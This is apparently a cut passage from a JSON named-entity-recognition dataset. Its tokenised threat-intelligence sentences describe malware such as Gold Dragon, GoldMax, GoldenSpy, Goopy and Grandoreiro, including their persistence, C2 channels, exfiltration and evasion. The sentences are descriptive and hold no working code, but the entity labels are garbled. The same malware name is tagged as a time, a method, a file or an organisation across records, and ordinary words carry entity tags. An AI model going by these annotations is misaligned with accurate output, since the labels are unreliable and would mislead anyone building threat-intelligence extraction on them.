"O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Get2", - "has", - "the", - "ability", - "to", - "run", - "executables", - "with", - "command-line", - "arguments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Get2", - "has", - "the", - "ability", - "to", - "inject", - "DLLs", - "into", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Get2", - "has", - "the", - "ability", - "to", - "identify", - "running", - "processes", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Get2", - "has", - "the", - "ability", - "to", - "identify", - "the", - "computer", - "name", - "and", - "Windows", - "version", - "of", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Get2", - "has", - "the", - "ability", - "to", - "identify", - "the", - "current", - "username", - "of", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Get2", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "to", - "send", - "information", - "collected", - "from", - "an", - "infected", - "host", - "to", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "encrypts", - "data", - "using", - "Base64", - "before", - "being", - "sent", - "to", - "the", - "command", - "and", - "control", - "server." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "terminates", - "anti-malware", - "processes", - "if", - "they’re", - "found", - "running", - "on", - "the", - "system." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "deletes", - "one", - "of", - "its", - "files,", - "2.hwp,", - "from", - "the", - "endpoint", - "after", - "establishing", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "lists", - "the", - "directories", - "for", - "Desktop,", - "program", - "files,", - "and", - "the", - "user’s", - "recently", - "accessed", - "files." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "can", - "download", - "additional", - "components", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "stores", - "information", - "gathered", - "from", - "the", - "endpoint", - "in", - "a", - "file", - "named", - "1.hwp." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "checks", - "the", - "running", - "processes", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "enumerates", - "registry", - "keys", - "with", - "the", - "command", - "<code>regkeyenum</code>", - "and", - "obtains", - "information", - "for", - "the", - "Registry", - "key", - "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "establishes", - "persistence", - "in", - "the", - "Startup", - "folder." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "checks", - "for", - "anti-malware", - "products", - "and", - "processes." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "collects", - "endpoint", - "information", - "using", - "the", - "<code>systeminfo</code>", - "command." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "collects", - "the", - "endpoint", - "victim's", - "username", - "and", - "uses", - "it", - "as", - "a", - "basis", - "for", - "downloading", - "additional", - "components", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "uses", - "HTTP", - "for", - "communication", - "to", - "the", - "control", - "servers." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "Gold", - "Dragon", - "uses", - "cmd.exe", - "to", - "execute", - "commands", - "for", - "discovery." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldFinder", - "logged", - "and", - "stored", - "information", - "related", - "to", - "the", - "route", - "or", - "hops", - "a", - "packet", - "took", - "from", - "a", - "compromised", - "machine", - "to", - "a", - "hardcoded", - "C2", - "server,", - "including", - "the", - "target", - "C2", - "URL,", - "HTTP", - "response/status", - "code,", - "HTTP", - "response", - "headers", - "and", - "values,", - "and", - "data", - "received", - "from", - "the", - "C2", - "node." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldFinder", - "performed", - "HTTP", - "GET", - "requests", - "to", - "check", - "internet", - "connectivity", - "and", - "identify", - "HTTP", - "proxy", - "servers", - "and", - "other", - "redirectors", - "that", - "an", - "HTTP", - "request", - "traveled", - "through." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldFinder", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "has", - "RSA-encrypted", - "its", - "communication", - "with", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "GoldMax", - "Linux", - "variant", - "has", - "used", - "a", - "crontab", - "entry", - "with", - "a", - "<code>@reboot</code>", - "line", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "has", - "decoded", - "and", - "decrypted", - "the", - "configuration", - "file", - "when", - "executed." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "has", - "written", - "AES-encrypted", - "and", - "Base64-encoded", - "configuration", - "files", - "to", - "disk." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "can", - "exfiltrate", - "files", - "over", - "the", - "existing", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "GoldMax", - "Linux", - "variant", - "has", - "been", - "executed", - "with", - "the", - "`nohup`", - "command", - "to", - "ignore", - "hangup", - "signals", - "and", - "continue", - "to", - "run", - "if", - "the", - "terminal", - "session", - "was", - "terminated." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "can", - "download", - "and", - "execute", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "has", - "used", - "decoy", - "traffic", - "to", - "surround", - "its", - "malicious", - "network", - "traffic", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "has", - "impersonated", - "systems", - "management", - "software", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "has", - "used", - "filenames", - "that", - "matched", - "the", - "system", - "name,", - "and", - "appeared", - "as", - "a", - "scheduled", - "task", - "impersonating", - "systems", - "management", - "software", - "within", - "the", - "corresponding", - "ProgramData", - "subfolder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "has", - "used", - "scheduled", - "tasks", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "has", - "been", - "packed", - "for", - "obfuscation." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "will", - "check", - "if", - "it", - "is", - "being", - "run", - "in", - "a", - "virtualized", - "environment", - "by", - "comparing", - "the", - "collected", - "MAC", - "address", - "to", - "<code>c8:27:cc:c2:37:5a</code>." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "retrieved", - "a", - "list", - "of", - "the", - "system's", - "network", - "interface", - "after", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "can", - "check", - "the", - "current", - "date-time", - "value", - "of", - "the", - "compromised", - "system,", - "comparing", - "it", - "to", - "the", - "hardcoded", - "execution", - "trigger", - "and", - "can", - "send", - "the", - "current", - "timestamp", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "has", - "set", - "an", - "execution", - "trigger", - "date", - "and", - "time,", - "stored", - "as", - "an", - "ASCII", - "Unix/Epoch", - "time", - "value." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "has", - "used", - "HTTPS", - "and", - "HTTP", - "GET", - "requests", - "with", - "custom", - "HTTP", - "cookies", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldMax", - "can", - "spawn", - "a", - "command", - "shell,", - "and", - "execute", - "native", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "has", - "been", - "packaged", - "with", - "a", - "legitimate", - "tax", - "preparation", - "software." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy's", - "uninstaller", - "has", - "base64-encoded", - "its", - "variables." - ], - "ner_tags": [ - "B-Way", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "has", - "exfiltrated", - "host", - "environment", - "information", - "to", - "an", - "external", - "C2", - "domain", - "via", - "port", - "9006." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy's", - "uninstaller", - "can", - "delete", - "registry", - "entries,", - "files", - "and", - "folders,", - "and", - "finally", - "itself", - "once", - "these", - "tasks", - "have", - "been", - "completed." - ], - "ner_tags": [ - "B-Time", - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "has", - "included", - "a", - "program", - "\"ExeProtector\",", - "which", - "monitors", - "for", - "the", - "existence", - "of", - "GoldenSpy", - "on", - "the", - "infected", - "system", - "and", - "redownloads", - "if", - "necessary." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "constantly", - "attempts", - "to", - "download", - "and", - "execute", - "files", - "from", - "the", - "remote", - "C2,", - "including", - "GoldenSpy", - "itself", - "if", - "not", - "found", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "can", - "create", - "new", - "users", - "on", - "an", - "infected", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy's", - "setup", - "file", - "installs", - "initial", - "executables", - "under", - "the", - "folder", - "<code>%WinDir%\\System32\\PluginManager</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "can", - "execute", - "remote", - "commands", - "in", - "the", - "Windows", - "command", - "shell", - "using", - "the", - "<code>WinExec()</code>", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "has", - "used", - "HTTP", - "over", - "ports", - "9005", - "and", - "9006", - "for", - "network", - "traffic,", - "9002", - "for", - "C2", - "requests,", - "33666", - "as", - "a", - "WebSocket,", - "and", - "8090", - "to", - "download", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "has", - "gathered", - "operating", - "system", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy's", - "installer", - "has", - "delayed", - "installation", - "of", - "GoldenSpy", - "for", - "two", - "hours", - "after", - "it", - "reaches", - "a", - "victim", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "has", - "used", - "the", - "Ryeol", - "HTTP", - "Client", - "to", - "facilitate", - "HTTP", - "internet", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "can", - "execute", - "remote", - "commands", - "via", - "the", - "command-line", - "interface." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GoldenSpy", - "has", - "established", - "persistence", - "by", - "running", - "in", - "the", - "background", - "as", - "an", - "autostart", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "had", - "null", - "characters", - "padded", - "in", - "its", - "malicious", - "DLL", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "delete", - "emails", - "used", - "for", - "C2", - "once", - "the", - "content", - "has", - "been", - "copied." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "side-load", - "malicious", - "DLLs", - "with", - "legitimate", - "applications", - "from", - "Kaspersky,", - "Microsoft,", - "and", - "Google." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-HackOrg", - "B-Way", - "O", - "O", - "O", - "O", - "B-Time", - "B-Org", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "communicate", - "with", - "its", - "C2", - "over", - "DNS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "exfiltrate", - "documents", - "from", - "infected", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "used", - "a", - "polymorphic", - "decryptor", - "to", - "decrypt", - "itself", - "at", - "runtime." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "disable", - "Microsoft", - "Outlook's", - "security", - "policies", - "to", - "disable", - "macro", - "warnings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "exfiltrate", - "data", - "over", - "the", - "Microsoft", - "Outlook", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "use", - "a", - "Microsoft", - "Outlook", - "backdoor", - "macro", - "to", - "communicate", - "with", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "impersonated", - "the", - "legitimate", - "goopdate.dll,", - "which", - "was", - "dropped", - "on", - "the", - "target", - "system", - "with", - "a", - "legitimate", - "GoogleUpdate.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "enumerate", - "the", - "infected", - "system's", - "user", - "name", - "via", - "<code>GetUserNameW</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Goopy's", - "decrypter", - "have", - "been", - "inflated", - "with", - "junk", - "code", - "in", - "between", - "legitimate", - "API", - "functions,", - "and", - "also", - "included", - "infinite", - "loops", - "to", - "avoid", - "analysis." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "checked", - "for", - "the", - "Google", - "Updater", - "process", - "to", - "ensure", - "Goopy", - "was", - "loaded", - "properly." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "maintain", - "persistence", - "by", - "creating", - "scheduled", - "tasks", - "set", - "to", - "run", - "every", - "hour." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "enumerate", - "the", - "infected", - "system's", - "user", - "name." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "use", - "a", - "Microsoft", - "Outlook", - "backdoor", - "macro", - "to", - "communicate", - "with", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "communicate", - "with", - "its", - "C2", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Goopy", - "has", - "the", - "ability", - "to", - "use", - "cmd.exe", - "to", - "execute", - "commands", - "passed", - "from", - "an", - "Outlook", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "identify", - "installed", - "security", - "tools", - "based", - "on", - "window", - "names." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "use", - "SSL", - "in", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "utilize", - "web", - "services", - "including", - "Google", - "sites", - "to", - "send", - "and", - "receive", - "C2", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "has", - "added", - "BMP", - "images", - "to", - "the", - "resources", - "section", - "of", - "its", - "Portable", - "Executable", - "(PE)", - "file", - "increasing", - "each", - "binary", - "to", - "at", - "least", - "300MB", - "in", - "size." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "use", - "malicious", - "browser", - "extensions", - "to", - "steal", - "cookies", - "and", - "other", - "user", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "monitor", - "browser", - "activity", - "for", - "online", - "banking", - "actions", - "and", - "display", - "full-screen", - "overlay", - "images", - "to", - "block", - "user", - "access", - "to", - "the", - "intended", - "site", - "or", - "present", - "additional", - "data", - "fields." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "bypass", - "UAC", - "by", - "registering", - "as", - "the", - "default", - "handler", - "for", - ".MSC", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "capture", - "clipboard", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "steal", - "cookie", - "data", - "and", - "credentials", - "from", - "Google", - "Chrome." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Purp", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "obtain", - "C2", - "information", - "from", - "Google", - "Docs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "decrypt", - "its", - "encrypted", - "internal", - "strings." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "block", - "the", - "Deibold", - "Warsaw", - "GAS", - "Tecnologia", - "security", - "tool", - "at", - "the", - "firewall", - "level." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "hook", - "APIs,", - "kill", - "processes,", - "break", - "file", - "system", - "paths,", - "and", - "change", - "ACLs", - "to", - "prevent", - "security", - "tools", - "from", - "running." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-HackOrg", - "I-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "use", - "a", - "DGA", - "for", - "hiding", - "C2", - "addresses,", - "including", - "use", - "of", - "an", - "algorithm", - "with", - "a", - "user-specific", - "key", - "that", - "changes", - "daily." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "has", - "used", - "compromised", - "websites", - "and", - "Google", - "Ads", - "to", - "bait", - "victims", - "into", - "downloading", - "its", - "installer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "parse", - "Outlook", - ".pst", - "files", - "to", - "extract", - "e-mail", - "addresses." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "Grandoreiro", - 